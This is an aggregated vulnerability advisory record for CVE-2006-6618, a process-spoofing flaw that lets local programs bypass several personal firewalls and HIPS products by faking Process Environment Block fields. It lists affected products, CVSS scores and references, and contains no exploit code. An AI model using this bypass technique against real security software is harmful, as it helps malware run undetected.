Sign-up

ID

VAR-200612-0204


CVE

CVE-2006-6618


TITLE

AntiHook - Desktop Vulnerabilities that prevent process product control on process

Trust: 0.8

sources: JVNDB: JVNDB-2006-001768

DESCRIPTION

AntiHook 3.0.0.23 - Desktop relies on the Process Environment Block (PEB) to identify a process, which allows local users to bypass the product's controls on a process by spoofing the (1) ImagePathName, (2) CommandLine, and (3) WindowTitle fields in the PEB. (1) PEB Inside ImagePathName (2) PEB Inside CommandLine (3) PEB Inside WindowTitle field. Multiple vendor firewalls and HIPS (host-based intrusion prevention systems) are prone to a process-spoofing vulnerability. An attacker can exploit this issue to have an arbitrary malicious program appear to run as a trusted process and function undetected on an affected victim's computer. The following software is vulnerable; other versions may also be affected: InfoProcess AntiHook version 3.0.0.23 AVG Anti-Virus plus Firewall version 7.5.431 Comodo Personal Firewall version 2.3.6.81 Filseclab Personal Firewall version 3.0.0.8686 Look 'n' Stop Personal Firewall version 2.05p2 Symantec Sygate Personal Firewall version 5.6.2808. are all very popular firewalls. There are loopholes in the processing of user-mode process information in multiple host security software, and attackers may use this loophole to bypass security restrictions. Personal firewalls, HIPS, and similar security software that enforce security on a per-process basis must be able to identify processes attempting to perform privileged operations. A remote attacker can use the spoofed process to bypass the control of the security check. Including (1) the image directory name, (2) the command line, and (3) the WINDOWS header text in the PEB

Trust: 1.98

sources: NVD: CVE-2006-6618 // JVNDB: JVNDB-2006-001768 // BID: 21615 // VULHUB: VHN-22726

AFFECTED PRODUCTS

vendor:symantecmodel:sygate personal firewallscope:eqversion:5.6.2808

Trust: 1.9

vendor:infoprocessmodel:antihookscope:eqversion:3.0.23

Trust: 1.3

vendor:filseclabmodel:personal firewallscope:eqversion:3.0.8686

Trust: 1.3

vendor:comodomodel:personal firewallscope:eqversion:2.3.6.81

Trust: 1.3

vendor:avgmodel:antivirus plus firewallscope:eqversion:7.5.431

Trust: 1.0

vendor:soft4evermodel:look n stopscope:eqversion:2.05p2

Trust: 1.0

vendor:infoprocessmodel:antihookscope:eqversion:3.0.0.23

Trust: 0.8

vendor:lookmodel:'n' stop look 'n' stop 2.05p2scope: - version: -

Trust: 0.3

vendor:avgmodel:anti-virus plus firewallscope:eqversion:7.5.431

Trust: 0.3

sources: BID: 21615 // JVNDB: JVNDB-2006-001768 // CNNVD: CNNVD-200612-391 // NVD: CVE-2006-6618

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2006-6618
value: HIGH

Trust: 1.0

NVD: CVE-2006-6618
value: HIGH

Trust: 0.8

CNNVD: CNNVD-200612-391
value: HIGH

Trust: 0.6

VULHUB: VHN-22726
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2006-6618
severity: HIGH
baseScore: 7.2
vectorString: AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-22726
severity: HIGH
baseScore: 7.2
vectorString: AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-22726 // JVNDB: JVNDB-2006-001768 // CNNVD: CNNVD-200612-391 // NVD: CVE-2006-6618

PROBLEMTYPE DATA

problemtype:NVD-CWE-Other

Trust: 1.0

sources: NVD: CVE-2006-6618

THREAT TYPE

local

Trust: 0.9

sources: BID: 21615 // CNNVD: CNNVD-200612-391

TYPE

access verification error

Trust: 0.6

sources: CNNVD: CNNVD-200612-391

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2006-001768

PATCH
title:Top Pageurl:http://www.infoprocess.com.au/AntiHook.php
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2006-001768

EXTERNAL IDS
db:NVDid:CVE-2006-6618
Trust: 2.5
db:BIDid:21615
Trust: 2.0
db:JVNDBid:JVNDB-2006-001768
Trust: 0.8
db:CNNVDid:CNNVD-200612-391
Trust: 0.7
db:BUGTRAQid:20061215 BYPASSING PROCESS IDENTIFICATION OF SEVERAL PERSONAL FIREWALLS AND HIPS
Trust: 0.6
db:VULHUBid:VHN-22726
Trust: 0.1
sources:
            
            
            VULHUB: VHN-22726 // 
            
            
            
            BID: 21615 // 
            
            
            
            JVNDB: JVNDB-2006-001768 // 
            
            
            
            CNNVD: CNNVD-200612-391 // 
            
            
            
            NVD: CVE-2006-6618

REFERENCES
url:http://www.securityfocus.com/bid/21615
Trust: 1.7
url:http://www.matousec.com/downloads/windows-personal-firewall-analysis/ex-coat.zip
Trust: 1.7
url:http://www.matousec.com/info/advisories/bypassing-process-identification-serveral-personal-firewalls-hips.php
Trust: 1.7
url:http://www.securityfocus.com/archive/1/454522/100/0/threaded
Trust: 1.1
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-6618
Trust: 0.8
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-6618
Trust: 0.8
url:http://www.securityfocus.com/archive/1/archive/1/454522/100/0/threaded
Trust: 0.6
url:http://www.infoprocess.com.au/antihook.php
Trust: 0.3
url:http://www.grisoft.com/
Trust: 0.3
url:http://www.comodo.com/
Trust: 0.3
url:http://www.google.ca/url?sa=t&ct=res&cd=1&url=http%3a%2f%2fwww.filseclab.com%2feng%2fproducts%2ffirewall.htm&ei=d_6crfdcapuwnqptjcb_&usg=__uqizxyyvwb4dlpaaogel8nftkja=&sig2=riufvoqmxrfqyl4h1bsrzq
Trust: 0.3
url:http://www.symantec.com
Trust: 0.3
url:http://www.google.ca/url?sa=t&ct=res&cd=1&url=http%3a%2f%2fwww.looknstop.com%2f&ei=m_6crfl8n6cunqp5wef7&usg=__ufqwvzzztduykujwzxq2euu_xna=&sig2=1vrohasxv2wrxkwcut7fua
Trust: 0.3
url:/archive/1/454522
Trust: 0.3
sources:
            
            
            VULHUB: VHN-22726 // 
            
            
            
            BID: 21615 // 
            
            
            
            JVNDB: JVNDB-2006-001768 // 
            
            
            
            CNNVD: CNNVD-200612-391 // 
            
            
            
            NVD: CVE-2006-6618

CREDITS
Matousec http://www.matousec.com/
Trust: 0.6
sources:
            
            
            CNNVD: CNNVD-200612-391

SOURCES
db:VULHUBid:VHN-22726
db:BIDid:21615
db:JVNDBid:JVNDB-2006-001768
db:CNNVDid:CNNVD-200612-391
db:NVDid:CVE-2006-6618

LAST UPDATE DATE
2025-04-10T23:18:17.405000+00:00

SOURCES UPDATE DATE
db:VULHUBid:VHN-22726date:2018-10-17T00:00:00
db:BIDid:21615date:2006-12-15T21:18:00
db:JVNDBid:JVNDB-2006-001768date:2012-06-26T00:00:00
db:CNNVDid:CNNVD-200612-391date:2007-02-06T00:00:00
db:NVDid:CVE-2006-6618date:2025-04-09T00:30:58.490

SOURCES RELEASE DATE
db:VULHUBid:VHN-22726date:2006-12-18T00:00:00
db:BIDid:21615date:2006-12-15T00:00:00
db:JVNDBid:JVNDB-2006-001768date:2012-06-26T00:00:00
db:CNNVDid:CNNVD-200612-391date:2006-12-18T00:00:00
db:NVDid:CVE-2006-6618date:2006-12-18T11:28:00